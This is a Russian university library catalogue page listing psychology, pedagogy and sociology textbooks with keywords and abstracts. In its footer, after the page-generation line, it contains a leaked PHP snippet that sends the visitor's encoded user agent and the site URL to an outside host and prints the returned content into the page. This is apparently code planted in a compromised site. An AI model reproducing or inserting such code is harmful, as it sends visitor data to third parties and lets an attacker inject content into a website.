12. 
Столяренко, Людмила Дмитриевна. Основы психологии [Текст] : Учеб. пособие для вузов / Л. Д. Столяренко, 2001. - 671 с.
Ключевые слова 
Психология -- Учебник и пособие * -- Познавательный процесс -- Сознание -- Психика -- Личность -- Типология личности -- Педагогика -- Педагогическая психология -- Возрастная психология -- ВОСПРИЯТИЕ -- ВНИМАНИЕ -- ПАМЯТЬ -- МЫШЛЕНИЕ -- ИНТЕЛЛЕКТ - ПСИХОЛОГИЯ -- ВООБРАЖЕНИЕ -- РЕЧЬ - ПСИХОЛОГИЯ -- СОЗНАНИЕ - ПСИХОЛОГИЯ -- СОН -- КРЕАТИВНОСТЬ - психология -- МЫШЛЕНИЕ -- САМОСОЗНАНИЕ -- ВОЛЯ -- ЭМОЦИИ -- ЛИЧНОСТЬ - ПСИХОЛОГИЯ -- СОЦИАЛИЗАЦИЯ ЛИЧНОСТИ -- СТАТУС СОЦИАЛЬНЫЙ -- ТИПОЛОГИЯ личности -- ТЕМПЕРАМЕНТ -- ХАРАКТЕР -- САМООЦЕНКА -- НЕВРОЗ -- ПСИХОСОЦИОТИП -- ТИПОЛОГИЯ СЕНСОРНАЯ -- ФРУСТРАЦИЯ -- ПОТРЕБНОСТЬ - ПСИХОЛОГИЯ -- МОТИВАЦИЯ - ПСИХОЛОГИЯ -- ТЕОРИЯ ЛИЧНОСТИ - Психология -- БИХЕВИОРИЗМ -- Сценарий жизненный -- ПСИХОЛОГИЯ ОБЩЕНИЯ -- ОБЩЕНИЕ - ПСИХОЛОГИЯ -- ГРУППА - ПСИХОЛОГИЯ -- КОЛЛЕКТИВ - ПСИХОЛОГИЯ -- СОЦИОМЕТРИЯ -- КОНФЛИКТ ЭТНИЧЕСКИЙ -- ЛИДЕРСТВО - ПСИХОЛОГИЯ -- СТИЛЬ УПРАВЛЕНИЯ -- ЭФФЕКТИВНОСТЬ УПРАВЛЕНИЯ -- МЕНЕДЖЕР - ПСИХОЛОГИЯ -- ПСИХОЛОГИЯ ПЕДАГОГИЧЕСКАЯ -- ДЕЯТЕЛЬНОСТЬ УЧЕБНАЯ -- ОБУЧЕНИЕ ПРОБЛЕМНОЕ -- Обучение программированное -- ИГРА ДЕЛОВАЯ учебная -- ОБУЧЕНИЕ ПРОИЗВОДСТВЕННОЕ -- ОБУЧЕНИЕ ПРОФЕССИОНАЛЬНОЕ -- ПРОЕКТИРОВАНИЕ ПЕДАГОГИЧЕСКО -- ОБЩЕНИЕ ПЕДАГОГИЧЕСКОЕ
13. 
Васильев, Владислав Леонидович. Юридическая психология [Текст] : Учеб. для вузов по специальности "Юриспруденция" / В. Л. Васильев, 2000. - 613 с.
14. 
Столяренко Л. Д. 100 экзаменационных ответов по психологии [Текст] : Экзаменац. экспресс-справ. / Л. Д. Столяренко, С. И. Самыгин, 2000. - 253 с.
Ключевые слова 
Психология -- Познавательный процесс -- Сознание -- Личность -- Человек -- Общение -- Психология личности -- Психология общения -- МЫШЛЕНИЕ -- Фрустрация -- ИНТЕЛЛЕКТ - ПСИХОЛОГИЯ -- ВООБРАЖЕНИЕ -- СОЗНАНИЕ - ПСИХОЛОГИЯ -- Подсознание -- Сон -- Эмоции -- СТРЕСС - ПСИХОЛОГИЯ -- Воля -- Мотивация -- СОЦИАЛИЗАЦИЯ ЛИЧНОСТИ -- ЛИЧНОСТЬ - ПСИХОЛОГИЯ -- Самосознание -- РОЛЬ СОЦИАЛЬНАЯ -- СТАТУС СОЦИАЛЬНЫЙ -- КОНФЛИКТ ВНУТРИЛИЧНОСТНЫЙ -- ТЕОРИЯ ЛИЧНОСТИ -- БИХЕВИОРИЗМ -- Темперамент -- ХАРАКТЕР -- Невроз -- АУТОТРЕНИНГ -- Психосоциотип -- Типология сенсорная -- ПСИХОЛОГИЯ ОБЩЕНИЯ -- ОБЩЕНИЕ - ПСИХОЛОГИЯ -- ГРУППА - ПСИХОЛОГИЯ -- ЛИДЕРСТВО - ПСИХОЛОГИЯ -- СТИЛЬ УПРАВЛЕНИЯ -- ЭФФЕКТИВНОСТЬ УПРАВЛЕНИЯ
15. 
Харчева, Валентина Геннадьевна. Основы социологии [Текст] : Учеб. для сред. спец. учеб. заведений / В. Г. Харчева, 2000. - 302 с.
16. 
Василькова, Юлия Валерьевна. Социальная педагогика [Текст] : Курс лекций: Учеб. пособие для высш. пед. учеб. заведений / Ю. В. Василькова, Т. А. Василькова, 2000. - 440 с.
Ключевые слова 
Педагогика -- Педагогика социальная -- Социальная педагогика -- Учебник и пособие * -- Детство -- Ребенок -- Социальный педагог -- Педагог -- Воспитание -- Воспитание детей -- кризис образования -- личность ребенка -- социализация личности -- социальное воспитание -- самовоспитание личности -- социальный педагог -- деятельность социального педагога -- защита детства -- история социальной педагогики в россии -- дореволюционная социальная педагогика в россии -- государственная политика защиты детей -- семейное воспитание -- домашнее образование -- православие и образование в россии -- религиозное образование -- воспитание христианина -- педагогика ненасилия -- свободное воспитание -- детские летние колонии -- классы для отстающих детей -- детские объединения -- скаутское движение -- социальная педагогика советского периода -- педагоги-новаторы -- работа социального педагога -- современная семья -- проблемы семьи -- кризис семьи -- детство -- защита детей в современных условиях -- конвенция о правах ребенка -- работа социального педагога с семьей -- работа социального педагога в школе -- работа социального педагога с трудными подростками -- работа социального педагога с одаренными детьми -- социальное воспитание за рубежом
17. 
Социология [Текст] : Конспект лекций в схемах / Ред.-сост. Д. И. Платонов, 2001. - 109 с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ -- ЗНАНИЕ -- СОЦИОЛОГИЧЕСКОЕ ЗНАНИЕ -- ПОЗИТИВИЗМ -- ОБЩЕСТВО -- РЕАЛИЗМ -- СОЦИАЛЬНЫЙ РЕАЛИЗМ -- ПОНИМАЮЩАЯ СОЦИОЛОГИЯ -- МАРКСИЗМ -- ОБЩЕСТВЕННО-ЭКОНОМИЧЕСКАЯ ФОРМАЦИЯ -- НАРОДНИЧЕСТВО -- СОЦИОЛОГИЧЕСКАЯ МЫСЛЬ -- ПОЗИТИВИЗМ -- СОЦИОЛОГИЧЕСКИЙ ПОЗИТИВИЗМ -- НЕОПОЗИТИВИЗМ -- ЗАПАДНАЯ СОЦИОЛОГИЯ -- КОНФЛИКТ -- СОЦИАЛЬНЫЙ КОНФЛИКТ -- СТРУКТУРА -- СОЦИАЛЬНАЯ СТРУКТУРА -- ЭТНИЧЕСКАЯ СОЦИОЛОГИЯ -- ПОЛИТИЧЕСКАЯ СОЦИОЛОГИЯ -- КУЛЬТУРА -- СОЦИОЛОГИЯ КУЛЬТУРЫ -- ОРГАНИЗАЦИЯ -- СОЦИАЛЬНАЯ ОРГАНИЗАЦИЯ -- СОЦИАЛЬНЫЙ ИНСТИТУТ -- ТРУД -- СОЦИОЛОГИЯ ТРУДА -- СЕМЬЯ -- СОЦИОЛОГИЯ СЕМЬИ -- ЛИЧНОСТЬ -- СОЦИАЛИЗАЦИЯ ЛИЧНОСТИ -- ГОРОД -- ДЕРЕВНЯ -- СОЦИОЛОГИЯ ГОРОДА -- СОЦИОЛОГИЯ ДЕРЕВНИ -- РАССЕЛЕНИЕ -- СОЦИОЛОГИЯ РАССЕЛЕНИЯ -- ОБЩЕСТВЕННОЕ МНЕНИЕ -- СВОБОДНОЕ ВРЕМЯ -- СОЦИОЛОГИЯ СВОБОДНОГО ВРЕМЕНИ -- КОНФЛИКТ -- СОЦИАЛЬНЫЙ КОНФЛИКТ -- ИССЛЕДОВАНИЕ -- СОЦИОЛОГИЧЕСКОЕ ИССЛЕДОВАНИЕ -- ОБЩНОСТЬ -- ЧЕЛОВЕЧЕСКАЯ ОБЩНОСТЬ -- АССОЦИАЦИЯ
18. 
Смирнов, Владимир Иванович. Общая педагогика [Текст] : Учеб. пособие для вузов по пед. направлениям и специальностям / В. И. Смирнов, 2003. - 302, [1] с.

В учебном пособии рассматриваются предмет и задачи педагогики, методология и методика педагогических исследований, факторы развития и способы бытия личности, в том числе роль семьи и коллектива в образовании и социализации. Раскрываются цели, содержание и технологии организации педагогического процесса. В отличие от первого издания (М.: Педагогическое общество России, 1999) отражены новейшие результаты развития педагогической мысли и практики, современные подходы к модернизации образования.

Для студентов высших учебных заведений, обучающихся по педагогическим направлениям и специальностям. Представляет интерес для учителей школ и широких кругов читателей.

19. 
Сластенин, Виталий Александрович. Педагогика [Текст] : Учеб. пособие по пед. специальностям / В. А. Сластенин, И. Ф. Исаев, Е. Н. Шиянов; Под ред. В. А. Сластенина, 2002. - 566, [1] с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- ПЕДАГОГИЧЕСКАЯ ДЕЯТЕЛЬНОСТЬ -- Педагогическая профессия -- Учитель -- ПЕДАГОГИЧЕСКАЯ НАУКА -- ПЕДАГОГИЧЕСКИЙ ПРОЦЕСС -- ОБРАЗОВАНИЕ -- ПЕДАГОГИЧЕСКОЕ ИССЛЕДОВАНИЕ -- СОЦИАЛИЗАЦИЯ ЛИЧНОСТИ -- ВОСПИТАНИЕ ЛИЧНОСТИ -- ОБУЧЕНИЕ -- ГОСУДАРСТВЕННЫЙ ОБРАЗОВАТЕЛЬНЫЙ СТАНДАРТ -- ВОСПИТАТЕЛЬНАЯ СИСТЕМА -- ПЕДАГОГИЧЕСКАЯ ТЕХНОЛОГИЯ -- ОБРАЗОВАТЕЛЬНАЯ СИСТЕМА -- ШКОЛА -- УПРАВЛЕНИЕ ШКОЛОЙ -- ПЕДАГОГИЧЕСКИЙ КОЛЛЕКТИВ -- ИННОВАЦИОННЫЙ ПРОЦЕСС -- АТТЕСТАЦИЯ

В учебном пособии раскрываются антропологические, аксиологические основы педагогики, теория и практика целостного педагогического процесса; организационно-деятельностные основы формирования базовой культуры школьника. Дается характеристика педагогических технологий, в том числе конструирования и осуществления педагогического процесса, педагогического общения и др. Раскрываются вопросы управления образовательными системами. Авторы - лауреаты премии Правительства РФ в области образования.

Может быть полезно учителям, руководителям системы образования.

20. 
Педагогика [Текст] : Учеб. пособие для пед. учеб. заведений / В. В. Воронов, В. И. Журавлев, В. В. Краевский и др; Под ред. П. И. Пидкасистого, 2002. - 638 с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- ПЕДАГОГИЧЕСКОЕ ИССЛЕДОВАНИЕ -- ВОСПИТАНИЕ -- РАЗВИТИЕ ЛИЧНОСТИ -- СОЦИАЛИЗАЦИЯ ЛИЧНОСТИ -- ЛИЧНОСТЬ -- ДИДАКТИКА -- ОБУЧЕНИЕ -- ОБРАЗОВАНИЕ -- ШКОЛЬНОЕ образование -- ШКОЛА -- ШКОЛОВЕДЕНИЕ -- УЧЕБНЫЙ ПРОЦЕСС -- УРОК -- ВОСПИТАТЕЛЬНЫЙ ПРОЦЕСС -- СЕМЕЙНОЕ ВОСПИТАНИЕ -- УПРАВЛЕНИЕ ШКОЛОЙ -- ПЕДАГОГИЧЕСКИЙ КОЛЛЕКТИВ -- УЧИТЕЛЬ -- АТТЕСТАЦИЯ -- ДИРЕКТОР -- анализ урока -- самооценка урока -- проверка результатов обучения -- оценка результатов обучения -- оценка знаний учащихся -- неуспеваемость учащихся -- самовоспитание -- перевоспитание -- воспитание учащихся -- теория воспитания -- закономерности воспитания -- принципы воспитания -- воспитательный процесс -- содержание воспитательного процесса -- социальное пространство -- психологический климат группы -- методы воспитания -- средства воспитательного процесса -- формы воспитательного процесса -- семейное воспитание -- педагогические лектории -- родительские собрания -- нормативные документы о школе -- закон об образовании -- школоведение -- педагогический коллектив -- планирование работы в школе -- руководитель школы -- труд учителя -- методическая работа в школе -- аттестация педагогического персонала -- директор школы -- самообразование учителя -- аттестация учителей -- передовой педагогический опыт -- система внутришкольного контроля -- финансовые поступления в школу -- бюджет школы -- наглядные пособия -- оборудование кабинетов -- хозяйственное обеспечение школы -- оформление школы -- оформление учительской -- школьная документация -- внутришкольная оперативная информация
21. 
Харчева, Валентина Геннадьевна. Основы социологии [Текст] : Учеб. для сред. спец. учеб. заведений / В. Г. Харчева, 1999. - 302 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3216 - 30.03.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.29 с.18 запросов, 1.02c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;